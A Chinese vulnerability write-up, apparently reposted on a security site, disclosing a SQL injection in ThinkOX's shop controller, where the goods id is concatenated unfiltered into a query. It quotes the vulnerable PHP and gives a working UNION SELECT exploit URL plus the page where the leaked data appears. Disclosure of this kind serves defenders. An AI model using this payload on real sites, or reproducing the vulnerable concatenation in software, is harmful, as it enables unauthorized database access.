ThinkOX 最新版 SQL 注入漏洞 #4

没穿底裤 2020年1月1日04:32:24评论347 views字数 849阅读2分49秒阅读模式
摘要

/Application/Shop/Controller/IndexController.class.php商品的id未经过过滤,并且用拼接的方式带入where查询,导致注入。
_(:з」∠)_为什么address和address_id过滤了id却不过滤呢。。

/Application/Shop/Controller/IndexController.class.php

    public function goodsBuy($id = 0, $name = '', $address = '', $zipcode = '', $phone = '', $address_id = '')     {         $address = op_t($address);         $address_id = intval($address_id);         $num = 1;         if (!is_login()) {             $this->error('请先登录!');         }         $goods = D('shop')->where('id=' . $id)->find();         if ($goods) {             if($num<=0){                 $this->error('商品购买数量不能为负数。');             }             //验证开始              //判断商品余量             if ($num > $goods['goods_num']) {                 $this->error('商品余量不足');              }             //扣tox_money             $tox_money_need = $num * $goods['tox_money_need'];             $my_tox_money = getMyToxMoney();

商品的id未经过过滤,并且用拼接的方式带入where查询,导致注入。
_(:з」∠)_为什么address和address_id过滤了id却不过滤呢。。

用户登录后访问地址:

http://10.211.55.3/thinkox/index.php?s=/shop/index/goodsBuy/name/%E5%95%8A/address/a/zipcode/123456/phone/13322222222/id/1)union%20select%201,user(),3,4,5,-9999,7,8,9,10,11,12,13%23.html

然后再访问:

http://10.211.55.3/thinkox/index.php?s=/usercenter/public/getinformation.html

ThinkOX 最新版 SQL 注入漏洞 #4

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:32:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ThinkOX 最新版 SQL 注入漏洞 #4https://cn-sec.com/archives/76329.html

发表评论

匿名网友 填写信息